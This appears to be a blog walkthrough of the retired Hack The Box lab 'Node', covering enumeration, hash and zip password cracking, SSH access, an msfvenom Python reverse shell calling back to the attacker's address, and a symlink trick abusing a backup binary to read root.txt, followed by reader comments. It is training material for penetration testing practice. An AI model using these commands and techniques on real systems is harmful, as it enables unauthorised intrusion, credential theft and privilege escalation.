Hack the Box Challenge: Node Walkthrough
Hello friends!! Today we are going to solve another CTF challenge “Node” which is available online for those who want to increase their skill in penetration testing and black box testing. Node is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Task: find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.58 so let’s begin with nmap port enumeration.
nmap -A 10.10.10.58
From given below image, you can observe we found port 22 and 3000 are open in victim’s network.
Knowing port 3000 is running HTTP on target machine we preferred to explore his IP our browser.
We open /api/users and find a username and passwords in the hash.
We use https://crackstation.net to decode the hashes that we found earlier.
We click on login and use one the username to login with its corresponding password. When we log in we find an option to download the backup. We click on it and it downloads a file called “myplace.backup”.
We try to take a look at the downloaded file and find that it is base64 encoded.
We decode the backup file and find it to be a zip file.
cat myplace.backup | base64 --decode > myplace
When we try to unzip the file it asks for a password, so we use fcrackzip to brute-force the zip file using rockyou.txt as wordlist. After brute-forcing the file we find the password; we use this password to unzip the file.
fcrackzip -D -p /usr/share/wordlists/rockyou.txt data.zip
We use this username and password to login through ssh into the target machine.
We use wget to download the linEnum.sh file into the target machine and use it to enumerate the machine.
After logging in through ssh we download linEnum.sh into the target machine to enumerate the target machine and look for privilege escalation vectors.
We find 3 directories inside the home that means there may be 3 users with this name.
When we take a look at the process running into the system, we find that it is running app.js as tom user.
We open app.js and find the same username and password that we found earlier. It means that its backup was created using some script or program that we find earlier. Going through the file we also find this script calls for a file called backup in /usr/local/bin directory and uses a key to create a backup.
Now that we know that the target machine is running mongoDB we use this to exploit the system and get a reverse shell.
We first create a python one-liner reverse shell using msfvenom.
msfvenom -p cmd/unix/reverse_python lhost=10.10.14.3 lport 8765 R
We then set up our listener using netcat and wait for the reverse shell. After getting the reverse shell we spawn a tty shell using python and we find that we are login as tom user. Now we go to /home/tom directory and find the user.txt; when we open the file we get our first flag.
Now we create a new directory test, and we then symlink root.txt in root directory with /tmp/test. We then use backup binary to create a zip file that creates a backup for /tmp/test/ directory. As /tmp/test directory is linked to /root/root.txt it will actually create backup of the root.txt file in root directory.
mkdir test ln -s /root/root.txt /tmp/test /usr/bin/backup -q “the key in app.js” /tmp/test
We again go the web page and download the backup file. We decode it in the similar manner we did earlier and use the password “magicword” we found earlier to unzip the file. After unzipping the file we find root.txt when we open the file we find our final flag.
Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here
3 thoughts on “Hack the Box Challenge: Node Walkthrough”
awesome bro!!!! Easy and well explained, nice way to do it!!!
How did you figure out the backup -q parameter part?
I did not get that point how a linked file (symlink root.txt) can be copied with content whereas it does only contain link info rather than actual data. Is that a feature of backup binary?
Comments are closed.